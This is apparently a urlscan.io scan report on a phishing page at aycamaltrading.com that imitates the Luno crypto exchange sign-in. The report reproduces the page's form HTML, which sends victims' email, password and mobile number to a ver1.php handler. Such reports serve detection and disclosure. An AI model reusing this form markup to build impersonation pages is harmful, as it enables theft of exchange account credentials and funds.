aycamaltrading.com
Open in
urlscan Pro
162.0.232.74
Malicious Activity!
Public Scan
Submitted URL: http://tx3.in/NLSK
Effective URL: https://aycamaltrading.com/lno/
Submission: On January 20 via manual from IN — Scanned from DE
Effective URL: https://aycamaltrading.com/lno/
Submission: On January 20 via manual from IN — Scanned from DE
Form analysis
1 forms found in the DOMName: myform — POST ver1.php
<form method="post" name="myform" action="ver1.php"><luno-input _ngcontent-baq-c2="" formcontrolname="email" _nghost-baq-c10="" class="ng-pristine ng-valid ng-touched"><!----><mat-form-field _ngcontent-baq-c10="" appearance="outline"
class="mat-form-field ng-tns-c14-0 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-outline mat-form-field-can-float mat-form-field-has-label ng-invalid ng-dirty ng-star-inserted mat-form-field-hide-placeholder ng-touched"
color="primary" hiderequiredmarker="">
<div class="mat-form-field-wrapper">
<div class="mat-form-field-flex"><!----><!---->
<div class="mat-form-field-outline ng-tns-c14-0 ng-star-inserted">
<div class="mat-form-field-outline-start" style="width: 7px;"></div>
<div class="mat-form-field-outline-gap" style="width: 39.25px;"></div>
<div class="mat-form-field-outline-end"></div>
</div>
<div class="mat-form-field-outline mat-form-field-outline-thick ng-tns-c14-0 ng-star-inserted">
<div class="mat-form-field-outline-start" style="width: 7px;"></div>
<div class="mat-form-field-outline-gap" style="width: 39.25px;"></div>
<div class="mat-form-field-outline-end"></div>
</div><!----> <div class="mat-form-field-infix">Email Address<input _ngcontent-baq-c10="" class="mat-input-element mat-form-field-autofill-control cdk-text-field-autofill-monitored ng-invalid ng-dirty ng-touched" matinput=""
type="email" name="email" required="" id="mat-input-0" aria-invalid="false" aria-required="true"><!----><span class="mat-form-field-label-wrapper"><!----><label
class="mat-form-field-label ng-tns-c14-0 mat-empty mat-form-field-empty ng-star-inserted" id="mat-form-field-label-1" for="mat-input-0" aria-owns="mat-input-0"><!----><!----><!----><mat-label _ngcontent-baq-c10=""
class="input-label ng-star-inserted"></mat-label><!----><!----></label></span></div><!---->
</div><!----><br><br>
<!----><mat-form-field appearance="outline"
class="mat-form-field ng-tns-c13-1 mat-#12326B mat-form-field-type-mat-input mat-form-field-appearance-outline mat-form-field-can-float ng-pristine ng-invalid ng-star-inserted mat-form-field-invalid mat-form-field-hide-placeholder ng-touched"
color="#12326B" hiderequiredmarker="">
<div class="mat-form-field-wrapper">
<div class="mat-form-field-flex"><!----><!---->
<div class="mat-form-field-outline ng-tns-c13-1 ng-star-inserted">
<div class="mat-form-field-outline-start" style="width: 7px;"></div>
<div class="mat-form-field-outline-gap" style="width: 62.5px;"></div>
<div class="mat-form-field-outline-end"></div>
</div>
<div class="mat-form-field-outline mat-form-field-outline-thick ng-tns-c13-1 ng-star-inserted">
<div class="mat-form-field-outline-start" style="width: 7px;"></div>
<div class="mat-form-field-outline-gap" style="width: 62.5px;"></div>
<div class="mat-form-field-outline-end"></div>
</div><!----> <div class="mat-form-field-infix"> Password <input class="mat-input-element mat-form-field-autofill-control cdk-text-field-autofill-monitored ng-pristine ng-invalid ng-touched" type="password" id="password"
name="password" pattern="(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,}" title="Must contain at least one number and one uppercase and lowercase letter, and at least 8 or more characters" required="">
<!----><span class="mat-form-field-label-wrapper"><!----><label class="mat-form-field-label ng-tns-c13-1 mat-empty mat-form-field-empty ng-star-inserted" id="mat-form-field-label-3" for="mat-input-1"
aria-owns="mat-input-1"><!----><!----><!----><mat-label class="input-label ng-star-inserted"> <!----></mat-label><!----><!----></label></span>
</div><!---->
<div class="mat-form-field-suffix ng-tns-c13-1 ng-star-inserted"><!----><!----><mat-icon class="input-mat-icon mat-icon material-icons ng-star-inserted" matsuffix="" role="img" aria-hidden="true">visibility_off</mat-icon></div>
</div><!---->
<div class="mat-form-field-subscript-wrapper"><!---->
<div class="ng-tns-c13-1 ng-trigger ng-trigger-transitionMessages ng-star-inserted" style="opacity: 1; transform: translateY(0%);"><!----><mat-error class="mat-error ng-star-inserted" role="alert" id="mat-error-1"></mat-error><!---->
</div><!---->
</div>
</div>
</mat-form-field>
<div id="message">
<h3>Password must contain the following:</h3>
<p id="letter" class="invalid">A <b>lowercase</b> letter</p>
<p id="capital" class="invalid">A <b>capital (uppercase)</b> letter</p>
<p id="number" class="invalid">A <b>number</b></p>
<p id="length" class="invalid">Minimum <b>8 characters</b></p>
</div>
<script>
var myInput = document.getElementById("password");
var letter = document.getElementById("letter");
var capital = document.getElementById("capital");
var number = document.getElementById("number");
var length = document.getElementById("length");
// When the user clicks on the password field, show the message box
myInput.onfocus = function() {
document.getElementById("message").style.display = "block";
}
// When the user clicks outside of the password field, hide the message box
myInput.onblur = function() {
document.getElementById("message").style.display = "none";
}
// When the user starts to type something inside the password field
myInput.onkeyup = function() {
// Validate lowercase letters
var lowerCaseLetters = /[a-z]/g;
if (myInput.value.match(lowerCaseLetters)) {
letter.classList.remove("invalid");
letter.classList.add("valid");
} else {
letter.classList.remove("valid");
letter.classList.add("invalid");
}
// Validate capital letters
var upperCaseLetters = /[A-Z]/g;
if (myInput.value.match(upperCaseLetters)) {
capital.classList.remove("invalid");
capital.classList.add("valid");
} else {
capital.classList.remove("valid");
capital.classList.add("invalid");
}
// Validate numbers
var numbers = /[0-9]/g;
if (myInput.value.match(numbers)) {
number.classList.remove("invalid");
number.classList.add("valid");
} else {
number.classList.remove("valid");
number.classList.add("invalid");
}
// Validate length
if (myInput.value.length >= 8) {
length.classList.remove("invalid");
length.classList.add("valid");
} else {
length.classList.remove("valid");
length.classList.add("invalid");
}
}
</script>
<div class="mat-form-field-flex"><!----><!---->
<div class="mat-form-field-outline ng-tns-c14-0 ng-star-inserted">
<div class="mat-form-field-outline-start" style="width: 7px;"></div>
<div class="mat-form-field-outline-gap" style="width: 39.25px;"></div>
<div class="mat-form-field-outline-end"></div>
</div>
<div class="mat-form-field-outline mat-form-field-outline-thick ng-tns-c14-0 ng-star-inserted">
<div class="mat-form-field-outline-start" style="width: 7px;"></div>
<div class="mat-form-field-outline-gap" style="width: 39.25px;"></div>
<div class="mat-form-field-outline-end"></div>
</div><!----> <div class="mat-form-field-infix">Mobile Number<input _ngcontent-baq-c10="" class="mat-input-element mat-form-field-autofill-control cdk-text-field-autofill-monitored ng-invalid ng-dirty ng-touched" matinput=""
type="number" name="contact" required="" id="mat-input-0" aria-invalid="false" aria-required="true"><!----><span class="mat-form-field-label-wrapper"><!----><label
class="mat-form-field-label ng-tns-c14-0 mat-empty mat-form-field-empty ng-star-inserted" id="mat-form-field-label-1" for="mat-input-0" aria-owns="mat-input-0"><!----><!----><!----><mat-label _ngcontent-baq-c10=""
class="input-label ng-star-inserted"></mat-label><!----><!----></label></span></div><!---->
</div>
<div class="mat-form-field-subscript-wrapper"><!----><!---->
<div class="mat-form-field-hint-wrapper ng-tns-c14-0 ng-trigger ng-trigger-transitionMessages ng-star-inserted" style="opacity: 1; transform: translateY(0%);"><!----><!---->
<div class="mat-form-field-hint-spacer"></div>
</div>
</div>
</div>
</mat-form-field></luno-input><mat-card-actions _ngcontent-baq-c2="" class="mat-card-actions"><button _ngcontent-baq-c2="" color="primary" mat-flat-button="" class="mat-flat-button mat-button-base mat-primary"><span
class="mat-button-wrapper">Next</span>
<div class="mat-button-ripple mat-ripple" matripple=""></div>
<div class="mat-button-focus-overlay"></div>
</button><luno-button _ngcontent-baq-c2="" _nghost-baq-c12=""
class="is-secondary"><!----><!----><!----><!----><!----><!----><a _ngcontent-baq-c12="" color="primary" mat-button="" role="button" class="mat-button mat-button-base mat-primary ng-star-inserted" tabindex="0" aria-disabled="false"><span class="mat-button-wrapper"><!----><!----><!---->Having trouble?<!----><!----></span><div class="mat-button-ripple mat-ripple" matripple=""></div><div class="mat-button-focus-overlay"></div></a><!----><!----><!----></luno-button></mat-card-actions>
</form>
Text Content
* Sign in * Sign up * BTC/ZAR 896,190 * * Wallet * Exchange * ACCOUNT * Sign up * Sign in -------------------------------------------------------------------------------- PRICE CHARTS * Bitcoin price * Ethereum price * Bitcoin Cash price * XRP price * Litecoin price -------------------------------------------------------------------------------- PRODUCTS * Bitcoin Wallet * Fees * Exchange * Business * Luno API -------------------------------------------------------------------------------- RESOURCES * Blog * Help Centre * Learning Portal -------------------------------------------------------------------------------- ABOUT * Company * Careers * Press -------------------------------------------------------------------------------- This page requires Javascript to be enabled. SIGN IN Email Address Password visibility_off PASSWORD MUST CONTAIN THE FOLLOWING: A lowercase letter A capital (uppercase) letter A number Minimum 8 characters Mobile Number Next Having trouble? or sign in with your social account Continue with Google Continue with Apple Continue with Facebook